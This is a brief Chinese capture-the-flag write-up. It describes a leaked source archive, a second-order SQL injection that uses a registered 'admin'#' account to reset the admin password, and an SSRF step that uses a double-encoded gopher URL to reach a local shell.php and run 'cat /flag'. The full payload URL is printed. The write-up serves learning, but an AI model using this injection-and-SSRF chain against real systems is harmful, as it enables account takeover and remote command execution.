扫描发现有源码泄露www.zip,下载源码后审计发现修改密码处有漏洞,注册一个账号admin'# ,修改该账号的密码,通过sql注入可以修改admin的密码,登录admin账号后发现
访问提示
源码中有shell.php文件
需要我们用ssrf来调用shell.php,测试发现只有gopher协议可以用,百度gopher发送http请求
二次编码最终payload
http://220.249.52.133:59889/xinan/public/55ceedfbc97b0a81277a55506c34af36.php?url=gopher://127.0.0.1:80/_GET%2520/xinan/public/shell.php%253fcmd%253dcat%2b%252fflag%253b%2520HTTP/1.1%250d%250AHost%253A%2520127.0.0.1%253A80%250d%250a